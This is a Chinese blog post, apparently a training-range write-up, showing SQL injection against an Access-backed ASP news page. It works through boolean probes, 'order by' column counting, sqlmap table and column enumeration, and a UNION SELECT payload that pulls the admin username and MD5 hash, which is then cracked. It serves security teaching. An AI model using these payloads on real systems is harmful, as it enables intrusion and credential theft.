ACCESS数据库注入解析

最新推荐文章于 2024-07-24 14:08:33 发布
最新推荐文章于 2024-07-24 14:08:33 发布
阅读量3.7k 收藏 1
点赞数
文章标签: access 渗透测试 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/recklesszhang/article/details/121967190
版权

       前言:在进行注入之前我们需要了解access数据库的特征,access数据库比较特殊:其结构与mysql ,mssql,MongoDB,postgresql,sqlit等数据不通。区别在与access数据库的接口是:表--列--数据  而其他数据库是:数据库--表--列--数据。并且access数据库没有记录所有表名和列名的表,也就意味着我们需要依靠字典进行猜解表名和列名。了解到这里那么我们就可以开始进行实施注入了。

    实验背景:我这里使用的是mozhe靶场进行演示(墨者学院_专注于网络安全人才培养首页> 在线靶场> SQL注入> SQL手工注入漏洞测试(Access数据库)

1.判断页面是否有注入点

    打开靶场环境我们看到url是:http://219.153.49.228:44574/new_list.asp?id=1 

http://219.153.49.228:44574/new_list.asp?id=1 and 1=1

http://219.153.49.228:44574/new_list.asp?id=1 and 1=2

进行测试,判断出来这个页面存在注入点。

2.判断数据库类型

这里我们可以借助sqlmap工具判断数据库类型

python sqlmap.py -u "http://219.153.49.228:44574/new_list.asp?id=1"

通过sqlmap工具判断出数据库版本类型是Access,可能是因为是access的原因没有判断出来具体的列,所以我们需要结合手工的方式进行判断

3.判断列名数量

http://219.153.49.228:44574/new_list.asp?id=1%20order%20by%204#

http://219.153.49.228:44574/new_list.asp?id=1%20order%20by%205#

所以注入点的列名数量为4

4.猜解表名

python sqlmap.py -u "http://219.153.49.228:44574/new_list.asp?id=1" –tables

我们可以从猜解的日志中查看到有两张表  admin和news这两张。

5.猜解列名

python sqlmap.py -u "http://219.153.49.228:44574/new_list.asp?id=1" -T"admin" –columns

猜解结果:

6.获取账号密码

继续使用手工注入的方式

在浏览器输入:

http://219.153.49.228:44574/new_list.asp?id=-1%20union%20select%201,username,passwd,4%20from%20admin

所以:

username: moke

passwd:7e6ec4fadf84938f

7.MD5解密

 md5解密得到:27737201

所以得到:

用户名:moke

密码:27737201

8.总结

    首先我们在得到注入点后,一定要先判断数据库类型,再进行注入,可以结合手工和工具的方式一起进行注入,并且我们要了解注入点数据库的特点以及注入数据的类型。

 

recklesszhang
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Access数据库注入之偏移注入
seek_2022的博客
05-02 2503
文章目录一、偏移注入使用场景二、必要的SQL知识补充(一)admin.*是什么意思?(二)联合查询的字段数问题(三)access如何查询指定数据?三、靶场实战(一)判断是否存在cookie注入(二)爆破表名(三)判断当前页面显错位(四)查询admin表字段数(五)偏移注入查询flag 一、偏移注入使用场景 在SQL注入的时候会遇到一些无法查询列名的问题,比如系统自带数据库的权限不够而无法访问系统自带库。 当你猜到表名无法猜到字段名的情况下,我们可以使用偏移注入来查询那张表里面的数据。像Sqlmap之类的工
Access注入详细笔记
weixin_46007361的博客
10-10 2135
Access注入
WEB攻防-ASP应用&HTTP.SYS&短文件&文件解析&Access注入&数据库泄漏
siu~
08-31 218
1、ASP-SQL注入-Access数据库(一般都是小型网站用的多,现在比较少见) 2、ASP-默认安装-数据库泄漏下载 3、ASP-IIS-CVE&短文件&解析&写入
数据库注入
WX公众号-小白学安全
03-31 352
Access Access是微软发布的关系数据库管理系统 基础语法同MySQL语法相似 注意:Access没有库的概念,只有表的概念 通常于ASP脚本语言搭配使用 Cookie ​ cookie:一串随机字符串,存储在用户本地终端上的数据,是某些网站为了辨别用户身份,进行session跟踪而存储在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时后永久保存的信息 存在意义 ​ Cookie认证技术简化了用户访问Web网站资源的过程,即用户只需在初次登录网站时输入身份信息进行认证,随后便可以访问被授
Access注入——Cookie注入,偏移注入
weixin_46601374的博客
02-26 1218
Cookie注入简介 什么是Cookie? Cookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号
sqlmap 跑access_access注入篇+sqlmap
weixin_28911533的博客
12-24 1182
access数据库的来历,我就不说了,因为我懒的记,就算记了感觉上也没大多用处,只要记得数据库的结构就行了。先是表名,然后是列名,再者就是数据,我发个实际的图吧,大概就是这么一个结构。下面,开始说下未过滤的SQL代码,说是SQL代码,其实应该说是asp代码,因为,很多access数据库都是和asp这个脚本语言相连的,关于asp这个脚本语言细节,想深入了解的可以百度下,毕竟搜索引擎也是一个很好的老师...
Access数据库,以及一些其他的库。
qq_44790964的博客
10-08 517
waf 安全注入漏洞分析 网站分类 一个是静态 html或者htm 是一种静态的网页,不需要服务器解析的其中脚本 如浏览器 ie chrome等 特点 1 不依赖数据库 2灵活性差 制作 更新 维护麻烦 3交互性较差 在功能方面有较大的限制 4安全,不存在sql注入漏洞 一个是动态 asp aspx php jsp等 由相应的脚本引擎来解释执行,根据指令生成静态网页...
access查询top10产品_access数据库 top
weixin_33721696的博客
12-23 1210
随说秋色园从Access升迁到MSSQL过程秋色园的运行环境概况:目前运行在国外godaddy的虚拟主机的一个子目录中,数据库Access。随说Access分页:1:top max(id)在CYQ.Data数据框架支持上Access时,以top max(id)为分页方式。在秋色园没有多少文章的情况下,基本上维持着正...文章泡泡浅眠2017-07-09914浏览量随机取若干条记录的SQL语句原...
某教程学习笔记(一):07、数据库漏洞(access注入
weixin_41489908的博客
02-18 415
钱钟书在《围成》里写到:“约着见一面,就能使见面的前后几天都沾着光,变成好日子”,是啊,只要能见你,雀跃的心情都会被拉得好长好长。感情就是这样,原则抵不过我乐意,你有你的打算,我有我的目的,因为我喜欢你,我所做的一切都是想跟你在一起。。。 一、网站分类 1、静态网页 html或者htm是静态页面,不需要服务器解析其中的脚本 特点:不依赖数据库,灵活性差,制作、更新、维护麻烦,交互性差,功能受限制,...
ASP 连接Access数据库的登陆系统
10-22
在这个案例中,我们将讨论如何使用ASP连接到Access数据库来构建一个登录系统。Access数据库是一种小型关系数据库管理系统,适合个人或小团队使用。以下是实现这个登录系统的详细步骤和知识点: 1. **数据库设计**:...
Access高级注入语句.txt
07-18
根据提供的文件信息,我们可以深入探讨有关Access数据库中的SQL注入技术,特别是高级注入技巧。下面将对文件中的几个关键部分进行详细解析。...希望这些深入的解析能够帮助您更全面地理解Access数据库中的SQL注入技术。
C#如何访问Access数据库
12-13
以下是一份详细的知识点解析,介绍如何在C#中实现对Access数据库的访问。 1. **ADO.NET框架**:C#访问数据库主要依赖于.NET Framework提供的ADO.NET组件,它提供了一套全面的数据访问接口,包括连接数据库、执行SQL...
Access数据库导入Mysql的方法之一
12-17
当需要将Access数据库的数据迁移到MySQL时,可以采取多种方法,而这里介绍的是一个通过编程实现的步骤。 **1. 数据导出** 首先,我们需要在Access中利用其内置的导出功能,将数据导出为一种易于处理的格式。在本例...
html连接access数据库的小例子
01-03
1. **创建ASP连接文件**:创建一个名为`dbConnection.asp`的ASP文件,用于建立与Access数据库的连接。在ASP中,我们可以使用ADO(ActiveX Data Objects)库来处理数据库操作。以下是一个基本的ASP连接示例: ```asp...
大坝安全监测设备有哪些主要功能?
最新发布
yyth13276363312的博客
07-24 253
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
如何避免蓝屏?轻量部署,安全和业务连续性才能两不误
亚信安全官方账号的博客
07-23 622
轻量部署,安全和业务连续性才能两不误
深入理解Kubescape: Kubernetes安全平台与容器镜像漏洞修复
TechEnthusiast的博客
07-23 216
Kubescape是一个开源的Kubernetes安全平台,由ARMO公司开发并维护。风险分析安全合规性检查配置错误扫描容器镜像漏洞扫描和修复Kubescape的优势在于其全面性和易用性。它不仅能够识别问题,还能提供修复建议,甚至在某些情况下自动进行修复。Kubescape作为一个全面的Kubernetes安全平台,其镜像修复功能为用户提供了强大的工具来应对容器安全挑战。通过自动化的漏洞扫描和修复流程,它大大降低了维护Kubernetes环境安全性的复杂度和工作量。
【技术升级】Docker环境下Nacos平滑升级攻略,安全配置一步到位
IT后浪的博客
07-23 503
目前项目当中使用的Nacos版本为2.0.2,该版本可能存在一定的安全风险。软件的安全性是一个持续关注的问题,尤其是对于像Nacos这样的服务发现与配置管理平台,它在微服务架构中扮演着核心角色。随着新版本的发布,开发团队会修复已知的安全漏洞,并增强系统的整体安全性。因此要及时升级Nacos,避免因为安全问题,对项目造成影响。
SQL注入基础:解析Access数据库注入技术
例如,当在URL后添加单引号时,服务器返回的错误信息揭示了网站使用的是Access数据库,并通过JET引擎连接,且暴露了查询表达式的部分结构。 在实际的注入过程中,攻击者会通过错误信息来推测数据库的结构,比如表名...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值